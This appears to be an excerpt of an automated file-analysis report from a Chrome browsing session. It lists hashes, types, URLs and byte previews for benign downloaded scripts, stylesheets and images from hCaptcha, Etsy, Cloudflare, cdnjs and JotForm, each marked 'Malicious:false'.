                                                                                                                                                                SHA-512:7FCF19892D1340952C78637001CC9EDCB779DDEDAC7306525726E877A05A8057877049E9293D94C6F323825BEFB7AF0FABA441AE34EA77F1D04B56156E345B9B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://newassets.hcaptcha.com/c/5b8e65083fb03d69f7f1c7f37b70a61765f316bdd0f1f53ab286361d1bc32723/hsw.js
                                                                                                                                                                Preview:var hsw=function BWJky(){"use strict";function A(A,Q,B){return Q<=A&&A<=B}function Q(A){if(void 0===A)return{};if(A===Object(A))return A;throw TypeError("Could not convert argument to dictionary")}var B=function(A){return A>=0&&A<=127},E=-1;function I(A){this.tokens=[].slice.call(A),this.tokens.reverse()}I.prototype={endOfStream:function(){return!this.tokens.length},read:function(){return this.tokens.length?this.tokens.pop():E},prepend:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.push(Q.pop());else this.tokens.push(A)},push:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.unshift(Q.shift());else this.tokens.unshift(A)}};var C=-1;function g(A,Q){if(A)throw TypeError("Decoder error");return Q||65533}function D(A){return A=String(A).trim().toLowerCase(),Object.prototype.hasOwnProperty.call(w,A)?w[A]:null}var w={};[{encodings:[{labels:["unicode-1-1-utf-8","utf-8","utf8"],name:"UTF-8"}],heading:"The Encoding"}].forEach((function(A){A.encodings.forEach((
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65391)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):414467
                                                                                                                                                                Entropy (8bit):5.550092212797127
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F63F34C5477A11F3053DFCEB5C5CF2CD
                                                                                                                                                                SHA1:22026375DE2E0BD1E78EC078B4ED74C3594186F3
                                                                                                                                                                SHA-256:AE1A30E9AF05FD4A5303099A2E645DE09078034E3ACD994EA876941D8DE3AAA4
                                                                                                                                                                SHA-512:0985407C90C388BE66509E6F0691158EFF14E8C1EAD995016D58F496A0168F0C64EDB67AEE014C9353A860C54426A4CD5CD0BABF73CBA4909ABCB74370E24751
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/app-shell/globals/index.f6017ef8ea6706fc185b.js
                                                                                                                                                                Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/app-shell/globals/index.f6017ef8ea6706fc185b.js.LICENSE.(()=>{var e={20580:(e,t,n)=>{var i=n(48738);(function(){"use strict";var e=0;var t=1;var n=2;var s=3;var a=4;var r=5;var o=6;var u=7;var l=8;var c=9;var d={activedescendant:s,atomic:e,autocomplete:l,busy:e,checked:t,controls:a,describedby:a,disabled:e,dropeffect:c,expanded:n,flowto:a,grabbed:n,haspopup:e,hidden:e,invalid:l,label:u,labelledby:a,level:r,live:l,multiline:e,multiselectable:e,orientation:l,owns:a,posinset:r,pressed:t,readonly:e,relevant:c,required:e,selected:n,setsize:r,sort:l,valuemax:o,valuemin:o,valuenow:o,valuetext:u};var h={};h[e]=["false","true"];h[t]=["undefined","true","false","mixed"];h[n]=["undefined","true","false"];var p={autocomplete:["none","inline","list","both"],dropeffect:["none","copy","move","link","execute","popup"],invalid:["false","grammar","spelling","true"],live:["off","polite","assertive"],orientation:["hor
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):42
                                                                                                                                                                Entropy (8bit):2.9881439641616536
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://trkn.us/pixel/conv/ppt=8398;g=homepage;gid=34719;ord=1728513234?gtmcb=1290036889;ip=8.46.123.33;cuidchk=1
                                                                                                                                                                Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):61
                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x250, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):30742
                                                                                                                                                                Entropy (8bit):7.994124372601855
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:B544BA704BDB1B60B21FD0575D86E8E5
                                                                                                                                                                SHA1:C417EC11CC7633A594847ED9B048AF2F98DA0AB6
                                                                                                                                                                SHA-256:C0B991084EE3A86C13818EACA9595D5D06D578FE3F58F933AFA7BB3465192661
                                                                                                                                                                SHA-512:E1A2753C65609CA34D5922D6602F4785BF9FDF7C32ACBFD1876660C9A4EE800D05102777AD92001B6CDCC3E98231494DF6DA263736E5520E8AACBB34C8BFBFC5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/ij/07d64d/6319311444/ij_fullxfull.6319311444_kvzzwsn3.jpg?version=0
                                                                                                                                                                Preview:RIFF.x..WEBPVP8 .x..."...*....>=..C.!..... .....v.\..J.+...y;.v....}..../).}...'.o....v...........T...3.'.o.?|?...................t?...~.|..J.E.......w...?./.?...?w..?...........>K..._.?.....}.........'....o.....G.W........g.7....+~A. .g.+.w..O..O.......V.+.E..........U.w.-._......7.O...?....................y...7././...?....w.{.O........C...s.....?x?._....h....8...r..G.+b.J.@.?.{..5S.../..Z......}.:_]..;..T...'y.K.v~..Q.:@;j[....6...-..r..:R....:.C.%......)..XC.]?V.C...k..O+I&......+....G..mJ-{.+.....j...C.......K...2..C.....5.D..x..J.QM_../..w0Z...J...w..?.M|....?.n&.h....9....l..Z..u..'........8..E_o+.0..X...G25..Ho.6.=....-..M'k.#..J..!..1`.(t.<......g..K]...X.T.....0R{...y.r..ch..{.N._.% .:.mA.z..F~.J.....R.W@...v..0.Q..].N../.)D.t.C..+....S,?....}..-.o. F..@B...B....c_.H.../.Ny...hR.u...jZ\9{........z{....)$.H{XP<z....}...r6j<9=/.j..9.....t...yk..GV.R_..{/....L.<.5.-h&K.}s.....v.e.....l....f..~......pr..H..y...Wr...XZo.}!].C..1..I6D..}..q.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):48316
                                                                                                                                                                Entropy (8bit):5.6346993394709
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (22096), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):22096
                                                                                                                                                                Entropy (8bit):5.1556985111456
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:4EDDEEC95AFDA969B3D1B2FB970C1EB1
                                                                                                                                                                SHA1:DA4C64223B6FF380F03AE2506DF526C22A9103D9
                                                                                                                                                                SHA-256:42E2DD427DD9F9D45367C880C68289114B7DE56373FF8BDC664EA0FA3CE77880
                                                                                                                                                                SHA-512:2D431F9BDB08263AB0BC0A596F13E35A136318DA42190EC08712FB1CF963A82EC56FD04231084C876F57853F5930E25F65B1F9D451BDDF140134C7C05F89A0C4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn.pdst.fm/ping.min.js
                                                                                                                                                                Preview:(()=>{"use strict";var t={228:t=>{var n=Object.prototype.hasOwnProperty,e="~";function r(){}function o(t,n,e){this.fn=t,this.context=n,this.once=e||!1}function i(t,n,r,i,c){if("function"!=typeof r)throw new TypeError("The listener must be a function");var u=new o(r,i||t,c),a=e?e+n:n;return t._events[a]?t._events[a].fn?t._events[a]=[t._events[a],u]:t._events[a].push(u):(t._events[a]=u,t._eventsCount++),t}function c(t,n){0==--t._eventsCount?t._events=new r:delete t._events[n]}function u(){this._events=new r,this._eventsCount=0}Object.create&&(r.prototype=Object.create(null),(new r).__proto__||(e=!1)),u.prototype.eventNames=function(){var t,r,o=[];if(0===this._eventsCount)return o;for(r in t=this._events)n.call(t,r)&&o.push(e?r.slice(1):r);return Object.getOwnPropertySymbols?o.concat(Object.getOwnPropertySymbols(t)):o},u.prototype.listeners=function(t){var n=e?e+t:t,r=this._events[n];if(!r)return[];if(r.fn)return[r.fn];for(var o=0,i=r.length,c=new Array(i);o<i;o++)c[o]=r[o].fn;return c},u
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 680x540, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):47576
                                                                                                                                                                Entropy (8bit):7.996147412931029
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:62186F07D28AE2FD0D14323117C41734
                                                                                                                                                                SHA1:4865A7AA9474715DA5A2405CA662227565DA7295
                                                                                                                                                                SHA-256:9225EC84359436E66AC042D14B3E6F3AA4DDB518294BC31A25633538FEA8636B
                                                                                                                                                                SHA-512:463D1A4B76AE05FEDA8ECC500003691873EDC1CD32E7EA90B4199F24686F5429BD35A9A717952C9BD28A2B7D8127FD5FFDB5699C9B3B5F6CCF73D4EFCF3E7FBD
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/13638923/r/il/da8b06/4267701070/il_680x540.4267701070_1uvx.jpg
                                                                                                                                                                Preview:RIFF...WEBPVP8 ...p....*....>E .E".##...8p..eem.......m........?.wL.r......x..P...v...T|....M.....3.%........S^.;\dNU...y^..`.'....G..|........c.......].~..t.s..=3.R.#...w......3.7._.?ko..........'.......k.{.......'._.?....../...?...........~I./._....M.;...~..o.../..8.s.Q.7...?............ot....~;.7..._._...{...............M............?....e...........'N.c.fktU.At.=ep....p.........n...i...g....M.........FFNF.Rx....QVz.+.........2..d.....HH%G.Z$...wK.A. ..........\........o.QT..A^.$..lX.$F....!.(....Uo.`.K\.N..j.PG..u..c....KB..^.%.3.....}..H.+...R.w..1i.+7.~.:6u.....e.{xU..).&.<...).Z..Z.[8.;..}s..2.I.b)9Y.&.AA.l$?~WE.:.M.dK.o....k..6.O.;)<k16.-7t....8...`.x.^...5!&....y....A.-.....B..'.~.X...&b.....l.k..*.@J3. .U$.P..'...q_V4C..\..6-..I.....Vd....#>r.zq...C./2...;.........|....r.%t.Af..!.....j*.Z.n..m..G.f.rA.I.w..):[s^....4.....k$v...s....y.m.-}#c<.3TT.8...\DTN.f.}.\.o.W.....3...N.....GfpQ..5.R..P.[.0-.#4l.dq..8....Z......x.*..H.e.....
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 340x270, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):32750
                                                                                                                                                                Entropy (8bit):7.994110587732591
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:50A66A92B79346B2B344AC25074C4B68
                                                                                                                                                                SHA1:1DB441789359CA5BA563CB885B564688FB4E83A7
                                                                                                                                                                SHA-256:A7D1177044FA54CE79D00C16ED3F5779C4CCF8FD5B154890747441F99B1B6F98
                                                                                                                                                                SHA-512:E9FCA67E92A4E7924732AB552518E3ADF265F164BC318B2E7C3FAFDCBF71B92B8FEBC3D5BEDFD257D43B5CF9504EC9543B90AFA3BE02FEB8821AE2CFFB084AD8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/34269816/r/il/443d0d/6289105270/il_340x270.6289105270_3g86.jpg
                                                                                                                                                                Preview:RIFF....WEBPVP8 .....H...*T...>E..C.....F.(.D..5.l..?.O._u.;...}...o.M.G.W................??...Y?d=.........../...?g=...~....M...O.o...O..`..X..._...?...{W..........v./.?-._..`.......3...}9....._..~..O..........M........|..S..........L.i...C].O.../......!...o...?......?...?.?.~..........O./..?.x-~k./.'.......?....c|...................u.........?........Y.......{.......2..r<...,...my.;C2P...|..f.f+A...i...........-..:]...]....n.J..#.H...Z.....m.._.a.1.8....Le...g.ceD/..V.TQ.|...TVf.}n..................TZ"j.OY!..=.....Y.V...G.bcx...C.q.Ch.}...k.....~.....X.`l.-3R..,w.l...fh=..j..a6..g.'9u.=y.A.Z,..1...QB...kq.....[....i.U..K]J.........qK.*.......jI.....+..z.hi.. .&<)bj.r...i....HD.....XnJ}......(..T)...'.}..\.i..p.\..J...hb...S.t...C.E&ML.....w.*...B5P.).1]........2..a4.HB.F..zA..is....w.l..y>.....cx....Js[}..0)y^wz.@\...S....8..G.'.-.......&.........gK.....0.O..S&&...;.,..<.............M<(./...QW...o.X|....a.`e.LAmo-jzL...v6w.}..*...3V....-.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (47459)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):47460
                                                                                                                                                                Entropy (8bit):5.397735966179774
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5D332FD1AE9FEB79A10425DFC3F84FE4
                                                                                                                                                                SHA1:C7D7F9D2BF5EE08E242765803CDD3A223FE1CBFC
                                                                                                                                                                SHA-256:2EA786910282DF7AE154A0011375CD1254ADBD8EF0E75EB62177ADA67DAF9611
                                                                                                                                                                SHA-512:01CDAC8103290B0FC1BF9BE8EE3923BFA6B8AD7778FF6B4716E421D6BBB3382240D9316B9994D6F4EA87E67DA9791EB8E3E2A1AAF81DBD749B3C8D7778E15F20
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/62ec4f065604/api.js
                                                                                                                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(p){Wt(l,o,c,h,f,"next",p)}function f(p){Wt(l,o,c,h,f,"throw",p)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (5642)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):18604
                                                                                                                                                                Entropy (8bit):5.07212974141709
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F2C988020990085070EE2DA7B41B3CAD
                                                                                                                                                                SHA1:7F78DE3C0BA2807AAF38E81309BA63B75B1B25C2
                                                                                                                                                                SHA-256:C518ED2201DB46D65DCFD9FE4842FE4DEB5773B8998AA2A2BD88EED231C438A9
                                                                                                                                                                SHA-512:8F0989F1C3C3684714F8CEFFAD5D0CD0EF7A4119D568FCAE8ED02F0097AAC74EC244C27D397BFE0C2D89735BBCE86C45284DBF3D0B955CB3D3A967822BEC2D8E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://form.jotform.com/242704649007052
                                                                                                                                                                Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html lang="en" class="supernova "><head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<link rel="alternate" type="application/json+oembed" href="https://www.jotform.com/oembed/?format=json&amp;url=https%3A%2F%2Fform.jotform.com%2F242704649007052" title="oEmbed Form">.<link rel="alternate" type="text/xml+oembed" href="https://www.jotform.com/oembed/?format=xml&amp;url=https%3A%2F%2Fform.jotform.com%2F242704649007052" title="oEmbed Form">.<meta property="og:title" content="Form" >.<meta property="og:url" content="https://form.jotform.com/242704649007052" >.<meta property="og:description" content="Please click the link to complete this form." >.<meta name="slack-app-id" content="AHNMASS8M">.<meta property="og:image" content="https://cdn.jotfor.ms/assets/img/landing/opengraph.png" />.<link rel="shortcut icon" href="https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-ligh
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (404)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):86821
                                                                                                                                                                Entropy (8bit):5.088521211933554
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:562AF5C904D400C7D4673BA875F569BB
                                                                                                                                                                SHA1:B964B17220167F72804A83E73CAD17D2FB3E27C3
                                                                                                                                                                SHA-256:A7DD4DF79B8BC77FAFD8E5ED631E4CD3C5A6556F97F038A8D54FD2916EF509F3
                                                                                                                                                                SHA-512:21D62A3C3A34034A6CB9148389D533A7CD3CF5FA947C5EBD2BFC10E003364070C6E6A8DAE5B07A05B7FE53DC5683412F4062D4D6E56CE947DA8B755CD20006B5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn03.jotfor.ms/css/styles/payment/payment_styles.css?3.3.57466
                                                                                                                                                                Preview:/* stylelint-disable */./* CORE PAYMENT UI //////////////// */...select_border,..select-area,.#productSearch-input,..select-content,.#coupon-input {. border-color: #c3cad8;. background-color: #fff;.}...form-product-category-item {. border-color: #d9dde4;.}...payment_footer,..p_item_separator {. border-top-color: rgba(195,202,216,.5);.}..form-product-item:not(.show_image).focusedProduct .p_col {. display: flex;. align-items: center;.}..form-product-item:not(.show_image).focusedProduct .p_col,..form-product-item.show_image .p_col {. padding-right: 16px;.}..card-2col .form-product-item,..card-3col .form-product-item {. border-color: rgba(195,202,216,.5);.}..card-2col .form-product-details,..card-3col .form-product-details {. color: #4c71fb;.}.#coupon-button {. border-color: #4c71fb;. background-color: #4c71fb;.}.#coupon-table {. border-spacing: 0;.}.. input.form-product-custom_price,. .form-product-item .custom-recurring-payments {. background: #fff;. background-color: #fff;
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19908
                                                                                                                                                                Entropy (8bit):7.934798389849329
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:FD1200A65B555E87BF89E51587ED5B00
                                                                                                                                                                SHA1:30DE7836CD7E17BA0EF30764919EE6917749ADF8
                                                                                                                                                                SHA-256:FF136FDE6D9A19532C07E5C59D6A2B13FAA3C8B76D6DF8DC7FB30D851F05C154
                                                                                                                                                                SHA-512:36B49F73F6F2F185F0D020C99200FA3DD86146A88B110F495E5F0FBB4B139172E1B5986C0B5398AD4342812DF7342D4115B9FF624D231491B6C29CA3A3FF72E0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..................................................#....#)" ")1,,1>;>QQm............................................#....#)" ")1,,1>;>QQm......,.,.."..........6..................................................................#.,..)...X.J..*..|.....2.K...!..r.dg.XqU.~....P_A?C.rp.M.b...@.X.@.Z....y.K6..K.gg.;7..G.=...e....>r^..y....~.l...}...OWun.9<....S...C..L...y...Q...O.s.$5.-......E5.E.M.t..T.X...W......r....<.)....m....
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 59x59, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15423
                                                                                                                                                                Entropy (8bit):7.919960806248683
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:CFEACB00F80857C0DC78DAA5175CBDB9
                                                                                                                                                                SHA1:B87787678EF8DC50D8715F5116AA90A1273EB1EA
                                                                                                                                                                SHA-256:A98837B6E9570CED3F060786E5776853E34D4A1C043854E40383561FADCCF328
                                                                                                                                                                SHA-512:CC70EC6707E61ABB04F6C8C21220D04A35D4C7D0E0466644AFB76824B5A5A9CEF0E54938000758F72E7EC05D75292F539433095BADD6F8704064D6C618003B2C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.....;.;......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.............................................................&""&0-0>>T.......................................................&""&0-0>>T......,.,.."..........5..................................................................'........S..8..4.Qh......e."@..j.K&K.7..j......uG..?....,,...o..|0..i...Q...NLh."..De..~.EO....P..W.]7.......)b..5D...*b..Y.~._U..>..8..."..|......do....P.>.0...0..L0...4....;....).E.4.4....5?;.OS#..fhUK:f..
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4286
                                                                                                                                                                Entropy (8bit):2.5369531650259916
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:334646AD0308B69A24FF4D607C193DD0
                                                                                                                                                                SHA1:B5169F56AA13767F13E14AE2DA83460E1F73E8EC
                                                                                                                                                                SHA-256:BF449CCEA57C0FE1C3491B0CA5B4EA71CEE4017A50324C8A51633EEFB11E85ED
                                                                                                                                                                SHA-512:6C36626CCDBDE7FCE81509AB2D5A16485F2E530D70B26A0E8651318954A2454F44A7471025914AA2DCADBB1269C6A0F0564DADD50099C409C8FD8FDC4E2532B2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:...... .... .........(... ...@..... ...... ...................d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d..................................................................................8....d...d...d...d...d...d...d...d...d...d...d..k...............................................................................Q....d...d...d...d...d...d...d...d...d...d...d...d...d...k..................k....k...d...d...d...d...d...d...k..Q...............k....d...d...d...d...d...d...d...d...d...d...d...d...d...d............
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):5380
                                                                                                                                                                Entropy (8bit):7.961886840249012
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F1D616890D51F866EFF7CE97EC66F45B
                                                                                                                                                                SHA1:1A5DECAD9BDA1FC8374E738A61E3B35B70DAFBE2
                                                                                                                                                                SHA-256:7C915C250EC356EB6D1E1715807149D836F1DC1528437883D859AD8A1507C472
                                                                                                                                                                SHA-512:60C5D636A4BE569BE8418F433B288BDB53A6F1E0F75907F4CB4AE2FAE97866498773EFE7F5CB0DDE225B657600CE7A7E7C9471664520EBFE8DE9380D394A32E5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/14313871/r/il/51cdb2/5196231180/il_300x300.5196231180_hx29.jpg
